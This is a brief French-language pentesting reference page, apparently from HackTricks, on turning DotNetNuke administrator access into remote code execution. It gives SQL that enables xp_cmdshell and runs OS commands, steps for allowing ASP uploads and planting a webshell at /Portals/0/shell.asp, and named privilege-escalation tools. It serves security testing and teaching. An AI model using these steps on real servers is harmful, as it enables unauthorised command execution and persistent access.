41 lines
1.3 KiB
Markdown

# DotNetNuke (DNN)
{{#include ../../banners/hacktricks-training.md}}
## DotNetNuke (DNN)
Si vous entrez en tant qu'**administrateur** dans DNN, il est facile d'obtenir un RCE.
## RCE
### Via SQL
Une console SQL est accessible sous la page **`Settings`** où vous pouvez activer **`xp_cmdshell`** et **exécuter des commandes système**.
Utilisez ces lignes pour activer **`xp_cmdshell`** :
```sql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
Et appuyez sur **"Run Script"** pour exécuter ces instructions sQL.
Ensuite, utilisez quelque chose comme ce qui suit pour exécuter des commandes OS :
```sql
xp_cmdshell 'whoami'
```
### Via ASP webshell
Dans `Settings -> Security -> More -> More Security Settings`, vous pouvez **ajouter de nouvelles extensions autorisées** sous `Allowable File Extensions`, puis cliquer sur le bouton `Save`.
Ajoutez **`asp`** ou **`aspx`** et ensuite dans **`/admin/file-management`**, téléchargez un **asp webshell** appelé `shell.asp` par exemple.
Ensuite, accédez à **`/Portals/0/shell.asp`** pour accéder à votre webshell.
### Privilege Escalation
Vous pouvez **escalader les privilèges** en utilisant **Potatoes** ou **PrintSpoofer** par exemple.
{{#include ../../banners/hacktricks-training.md}}